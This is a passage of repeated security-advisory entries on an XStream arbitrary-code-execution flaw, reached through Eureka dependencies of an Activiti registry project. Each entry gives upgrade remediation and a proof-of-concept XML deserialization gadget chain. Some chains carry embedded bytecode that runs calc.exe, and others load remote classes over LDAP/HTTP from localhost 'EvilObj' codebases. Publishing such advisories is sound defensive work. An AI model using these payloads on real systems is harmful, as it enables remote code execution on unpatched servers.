amF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEACGNhbGMuZXhlCAAwAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA1TdGFja01hcFRhYmxlAQAeeXNvc2VyaWFsL1B3bmVyNDE2NTkyOTE1MTgwNjAwAQAgTHlzb3NlcmlhbC9Qd25lcjQxNjU5MjkxNTE4MDYwMDsAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAvAA4AAAAMAAEAAAAFAA8AOAAAAAEAEwAUAAIADAAAAD8AAAADAAAAAbEAAAACAA0AAAAGAAEAAAA0AA4AAAAgAAMAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAFwAYAAIAGQAAAAQAAQAaAAEAEwAbAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAA4AA4AAAAqAAQAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAHAAdAAIAAAABAB4AHwADABkAAAAEAAEAGgAIACkACwABAAwAAAAkAAMAAgAAAA+nAAMBTLgALxIxtgA1V7EAAAABADYAAAADAAEDAAIAIAAAAAIAIQARAAAACgABAAIAIwAQAAk=</byte-array>
          <byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ</byte-array>
        </__bytecodes>
        <__transletIndex>-1</__transletIndex>
        <__indentNumber>0</__indentNumber>
      </default>
    </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
  </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
  <dynamic-proxy>
    <interface>javax.xml.transform.Templates</interface>
    <handler class='sun.reflect.annotation.AnnotationInvocationHandler' serialization='custom'>
      <sun.reflect.annotation.AnnotationInvocationHandler>
        <default>
          <memberValues>
            <entry>
              <string>f5a5a608</string>
              <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl reference='../../../../../../../com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl'/>
            </entry>
          </memberValues>
          <type>javax.xml.transform.Templates</type>
        </default>
      </sun.reflect.annotation.AnnotationInvocationHandler>
    </handler>
  </dynamic-proxy>
</linked-hash-set>

XStream xstream = new XStream();
xstream.fromXML(xml);

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.

References

Arbitrary Code Execution vulnerability report

high severity

Arbitrary Code Execution

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.

PoC

<javax.swing.event.EventListenerList serialization='custom'>
  <javax.swing.event.EventListenerList>
    <default>
      <listenerList>
        <javax.swing.undo.UndoManager>
          <hasBeenDone>true</hasBeenDone>
          <alive>true</alive>
          <inProgress>true</inProgress>
          <edits>
            <com.sun.xml.internal.ws.api.message.Packet>
              <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
                <parsedMessage>true</parsedMessage>
                <soapVersion>SOAP_11</soapVersion>
                <bodyParts/>
                <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
                  <attachmentsInitialized>false</attachmentsInitialized>
                  <multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>
                    <soapPart/>
                    <mm>
                      <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
                        <aliases class='com.sun.jndi.ldap.LdapBindingEnumeration'>
                          <cleaned>false</cleaned>
                          <entries>
                            <com.sun.jndi.ldap.LdapEntry>
                              <DN>cn=four,cn=three,cn=two,cn=one</DN>
                              <attributes class='javax.naming.directory.BasicAttributes' serialization='custom'>
                                <javax.naming.directory.BasicAttribute>
                                  <default>
                                    <ignoreCase>false</ignoreCase>
                                  </default>
                                  <int>4</int>
                                  <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
                                    <javax.naming.directory.BasicAttribute>
                                      <default>
                                        <ordered>false</ordered>
                                        <attrID>objectClass</attrID>
                                      </default>
                                      <int>1</int>
                                      <string>javanamingreference</string>
                                    </javax.naming.directory.BasicAttribute>
                                    <com.sun.jndi.ldap.LdapAttribute>
                                      <default>
                                        <rdn class='com.sun.jndi.ldap.LdapName' serialization='custom'>
                                          <com.sun.jndi.ldap.LdapName>
                                            <string>cn=four,cn=three,cn=two,cn=one</string>
                                            <boolean>false</boolean>
                                          </com.sun.jndi.ldap.LdapName>
                                        </rdn>
                                      </default>
                                    </com.sun.jndi.ldap.LdapAttribute>
                                  </com.sun.jndi.ldap.LdapAttribute>
                                  <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
                                    <javax.naming.directory.BasicAttribute>
                                      <default>
                                        <ordered>false</ordered>
                                        <attrID>javaCodeBase</attrID>
                                      </default>
                                      <int>1</int>
                                      <string>http://127.0.0.1:8080/</string>
                                    </javax.naming.directory.BasicAttribute>
                                    <com.sun.jndi.ldap.LdapAttribute>
                                      <default/>
                                    </com.sun.jndi.ldap.LdapAttribute>
                                  </com.sun.jndi.ldap.LdapAttribute>
                                  <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
                                    <javax.naming.directory.BasicAttribute>
                                      <default>
                                        <ordered>false</ordered>
                                        <attrID>javaClassName</attrID>
                                      </default>
                                      <int>1</int>
                                      <string>refObj</string>
                                    </javax.naming.directory.BasicAttribute>
                                    <com.sun.jndi.ldap.LdapAttribute>
                                      <default/>
                                    </com.sun.jndi.ldap.LdapAttribute>
                                  </com.sun.jndi.ldap.LdapAttribute>
                                  <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
                                    <javax.naming.directory.BasicAttribute>
                                      <default>
                                        <ordered>false</ordered>
                                        <attrID>javaFactory</attrID>
                                      </default>
                                      <int>1</int>
                                      <string>ExecTemplateJDK7</string>
                                    </javax.naming.directory.BasicAttribute>
                                    <com.sun.jndi.ldap.LdapAttribute>
                                      <default/>
                                    </com.sun.jndi.ldap.LdapAttribute>
                                  </com.sun.jndi.ldap.LdapAttribute>
                                </javax.naming.directory.BasicAttribute>
                              </attributes>
                            </com.sun.jndi.ldap.LdapEntry>
                          </entries>
                          <limit>2</limit>
                          <posn>0</posn>
                          <homeCtx/>
                          <more>true</more>
                          <hasMoreCalled>true</hasMoreCalled>
                        </aliases>
                      </it>
                    </mm>
                  </multiPart>
                </sm>
              </message>
            </com.sun.xml.internal.ws.api.message.Packet>
          </edits>
          <indexOfNextAdd>0</indexOfNextAdd>
          <limit>100</limit>
        </javax.swing.undo.UndoManager>
      </listenerList>
    </default>
    <string>java.lang.InternalError</string>
    <javax.swing.undo.UndoManager reference='../default/listenerList/javax.swing.undo.UndoManager'/>
    <null/>
  </javax.swing.event.EventListenerList>
</javax.swing.event.EventListenerList>

XStream xstream = new XStream();
xstream.fromXML(xml);

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.

References

Arbitrary Code Execution vulnerability report

high severity

Arbitrary Code Execution

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.

PoC

<sorted-set>
  <javax.naming.ldap.Rdn_-RdnEntry>
    <type>test</type>
    <value class='javax.swing.MultiUIDefaults' serialization='custom'>
      <unserializable-parents/>
      <hashtable>
          <default>
            <loadFactor>0.75</loadFactor>
            <threshold>525</threshold>
          </default>
          <int>700</int>
          <int>0</int>
      </hashtable>
      <javax.swing.UIDefaults>
          <default>
            <defaultLocale>zh_CN</defaultLocale>
            <resourceCache/>
          </default>
      </javax.swing.UIDefaults>
      <javax.swing.MultiUIDefaults>
          <default>
            <tables>
            <javax.swing.UIDefaults serialization='custom'>
              <unserializable-parents/>
              <hashtable>
                <default>
                  <loadFactor>0.75</loadFactor>
                  <threshold>525</threshold>
                </default>
                <int>700</int>
                <int>1</int>
                <string>lazyValue</string>
                <javax.swing.UIDefaults_-ProxyLazyValue>
                  <className>javax.naming.InitialContext</className>
                  <methodName>doLookup</methodName>
                  <args>
                    <string>ldap://127.0.0.1:1389/#evil</string>
                  </args>
                </javax.swing.UIDefaults_-ProxyLazyValue>
              </hashtable>
              <javax.swing.UIDefaults>
                <default>
                  <defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>
                  <resourceCache/>
                </default>
              </javax.swing.UIDefaults>
            </javax.swing.UIDefaults>
            </tables>
          </default>
      </javax.swing.MultiUIDefaults>
    </value>
  </javax.naming.ldap.Rdn_-RdnEntry>
  <javax.naming.ldap.Rdn_-RdnEntry>
    <type>test</type>
    <value class='com.sun.org.apache.xpath.internal.objects.XString'>
      <m__obj class='string'>test</m__obj>
    </value>
  </javax.naming.ldap.Rdn_-RdnEntry>
</sorted-set>

XStream xstream = new XStream();
xstream.fromXML(xml);

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.

References

Arbitrary Code Execution vulnerability report

high severity

Arbitrary Code Execution

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.

PoC

<sorted-set>
  <javax.naming.ldap.Rdn_-RdnEntry>
    <type>ysomap</type>
    <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
      <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
        <parsedMessage>true</parsedMessage>
        <soapVersion>SOAP_11</soapVersion>
        <bodyParts/>
        <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
          <attachmentsInitialized>false</attachmentsInitialized>
          <multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>
            <soapPart/>
            <mm>
              <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
                <aliases class='com.sun.jndi.toolkit.dir.ContextEnumerator'>
                  <children class='javax.naming.directory.BasicAttribute$ValuesEnumImpl'>
                    <list class='com.sun.xml.internal.dtdparser.SimpleHashtable'>
                      <current>
                        <hash>1</hash>
                        <key class='javax.naming.Binding'>
                          <name>ysomap</name>
                          <isRel>false</isRel>
                            <boundObj class='com.sun.jndi.ldap.LdapReferralContext'>
                              <refCtx class='javax.naming.spi.ContinuationDirContext'>
                                <cpe>
                                  <stackTrace/>
                                  <suppressedExceptions class='java.util.Collections$UnmodifiableRandomAccessList' resolves-to='java.util.Collections$UnmodifiableList'>
                                    <c class='list'/>
                                    <list reference='../c'/>
                                  </suppressedExceptions>
                                  <resolvedObj class='javax.naming.Reference'>
                                    <className>EvilObj</className>
                                    <addrs/>
                                    <classFactory>EvilObj</classFactory>
                                    <classFactoryLocation>http://127.0.0.1:1099/</classFactoryLocation>
                                  </resolvedObj>
                                  <altName class='javax.naming.CompoundName' serialization='custom'>
                                    <javax.naming.CompoundName>
                                      <properties/>
                                      <int>1</int>
                                      <string>ysomap</string>
                                    </javax.naming.CompoundName>
                                  </altName>
                                </cpe>
                              </refCtx>
                              <skipThisReferral>false</skipThisReferral>
                              <hopCount>0</hopCount>
                            </boundObj>
                        </key>
                      </current>
                      <currentBucket>0</currentBucket>
                      <count>0</count>
                      <threshold>0</threshold>
                    </list>
                  </children>
                  <currentReturned>true</currentReturned>
                  <currentChildExpanded>false</currentChildExpanded>
                  <rootProcessed>true</rootProcessed>
                  <scope>2</scope>
                </aliases>
              </it>
            </mm>
          </multiPart>
        </sm>
      </message>
    </value>
  </javax.naming.ldap.Rdn_-RdnEntry>
  <javax.naming.ldap.Rdn_-RdnEntry>
    <type>ysomap</type>
    <value class='com.sun.org.apache.xpath.internal.objects.XString'>
      <m__obj class='string'>test</m__obj>
    </value>
  </javax.naming.ldap.Rdn_-RdnEntry>
</sorted-set>

XStream xstream = new XStream();
xstream.fromXML(xml);

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.

References

Arbitrary Code Execution vulnerability report

high severity

Arbitrary Code Execution

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.

PoC

<sorted-set>
  <javax.naming.ldap.Rdn_-RdnEntry>
    <type>ysomap</type>
    <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
      <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
        <parsedMessage>true</parsedMessage>
        <soapVersion>SOAP_11</soapVersion>
        <bodyParts/>
        <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
          <attachmentsInitialized>false</attachmentsInitialized>
          <multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>
            <soapPart/>
            <mm>
              <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
                <aliases class='com.sun.jndi.ldap.LdapSearchEnumeration'>
                  <listArg class='javax.naming.CompoundName' serialization='custom'>
                    <javax.naming.CompoundName>
                      <properties/>
                      <int>1</int>
                      <string>ysomap</string>
                    </javax.naming.CompoundName>
                  </listArg>
                  <cleaned>false</cleaned>
                  <res>
                    <msgId>0</msgId>
                    <status>0</status>
                  </res>
                  <enumClnt>
                    <isLdapv3>false</isLdapv3>
                    <referenceCount>0</referenceCount>
                    <pooled>false</pooled>
                    <authenticateCalled>false</authenticateCalled>
                  </enumClnt>
                  <limit>1</limit>
                  <posn>0</posn>
                  <homeCtx>
                    <__contextType>0</__contextType>
                    <port__number>1099</port__number>
                    <hostname>127.0.0.1</hostname>
                    <clnt reference='../../enumClnt'/>
                    <handleReferrals>0</handleReferrals>
                    <hasLdapsScheme>true</hasLdapsScheme>
                    <netscapeSchemaBug>false</netscapeSchemaBug>
                    <referralHopLimit>0</referralHopLimit>
                    <batchSize>0</batchSize>
                    <deleteRDN>false</deleteRDN>
                    <typesOnly>false</typesOnly>
                    <derefAliases>0</derefAliases>
                    <addrEncodingSeparator/>
                    <connectTimeout>0</connectTimeout>
                    <readTimeout>0</readTimeout>
                    <waitForReply>false</waitForReply>
                    <replyQueueSize>0</replyQueueSize>
                    <useSsl>false</useSsl>
                    <useDefaultPortNumber>false</useDefaultPortNumber>
                    <parentIsLdapCtx>false</parentIsLdapCtx>
                    <hopCount>0</hopCount>
                    <unsolicited>false</unsolicited>
                    <sharable>false</sharable>
                    <enumCount>1</enumCount>
                    <closeRequested>false</closeRequested>
                  </homeCtx>
                  <more>true</more>
                  <hasMoreCalled>true</hasMoreCalled>
                  <startName class='javax.naming.ldap.LdapName' serialization='custom'>
                    <javax.naming.ldap.LdapName>
                      <default/>
                      <string>uid=ysomap,ou=oa,dc=example,dc=com</string>
                    </javax.naming.ldap.LdapName>
                  </startName>
                  <searchArgs>
                    <name class='javax.naming.CompoundName' reference='../../listArg'/>
                    <filter>ysomap</filter>
                    <cons>
                      <searchScope>1</searchScope>
                      <timeLimit>0</timeLimit>
                      <derefLink>false</derefLink>
                      <returnObj>true</returnObj>
                      <countLimit>0</countLimit>
                    </cons>
                    <reqAttrs/>
                  </searchArgs>
                  <entries>
                    <com.sun.jndi.ldap.LdapEntry>
                      <DN>uid=songtao.xu,ou=oa,dc=example,dc=com</DN>
                      <attributes class='javax.naming.directory.BasicAttributes' serialization='custom'>
                        <default>
                          <ignoreCase>false</ignoreCase>
                        </default>
                        <int>4</int>
                        <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
                          <javax.naming.directory.BasicAttribute>
                            <default>
                              <ordered>false</ordered>
                              <attrID>objectClass</attrID>
                            </default>
                            <int>1</int>
                            <string>javaNamingReference</string>
                          </javax.naming.directory.BasicAttribute>
                          <com.sun.jndi.ldap.LdapAttribute>
                            <default>
                              <rdn class=''javax.naming.CompositeName'' serialization=''custom''>
                                <javax.naming.CompositeName>
                                  <int>0</int>
                                </javax.naming.CompositeName>
                              </rdn>
                            </default>
                          </com.sun.jndi.ldap.LdapAttribute>
                        </com.sun.jndi.ldap.LdapAttribute>
                        <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
                          <javax.naming.directory.BasicAttribute>
                            <default>
                              <ordered>false</ordered>
                              <attrID>javaCodeBase</attrID>
                            </default>
                            <int>1</int>
                            <string>http://127.0.0.1/</string>
                          </javax.naming.directory.BasicAttribute>
                          <com.sun.jndi.ldap.LdapAttribute>
                            <default>
                              <rdn class=''javax.naming.CompositeName'' serialization=''custom''>
                                <javax.naming.CompositeName>
                                  <int>0</int>
                                </javax.naming.CompositeName>
                              </rdn>
                            </default>
                          </com.sun.jndi.ldap.LdapAttribute>
                        </com.sun.jndi.ldap.LdapAttribute>
                        <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
                          <javax.naming.directory.BasicAttribute>
                            <default>
                              <ordered>false</ordered>
                              <attrID>javaClassName</attrID>
                            </default>
                            <int>1</int>
                            <string>foo</string>
                          </javax.naming.directory.BasicAttribute>
                          <com.sun.jndi.ldap.LdapAttribute>
                            <default>
                              <rdn class=''javax.naming.CompositeName'' serialization=''custom''>
                                <javax.naming.CompositeName>
                                  <int>0</int>
                                </javax.naming.CompositeName>
                              </rdn>
                            </default>
                          </com.sun.jndi.ldap.LdapAttribute>
                        </com.sun.jndi.ldap.LdapAttribute>
                        <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
                          <javax.naming.directory.BasicAttribute>
                            <default>
                              <ordered>false</ordered>
                              <attrID>javaFactory</attrID>
                            </default>
                            <int>1</int>
                            <string>EvilObj</string>
                          </javax.naming.directory.BasicAttribute>
                          <com.sun.jndi.ldap.LdapAttribute>
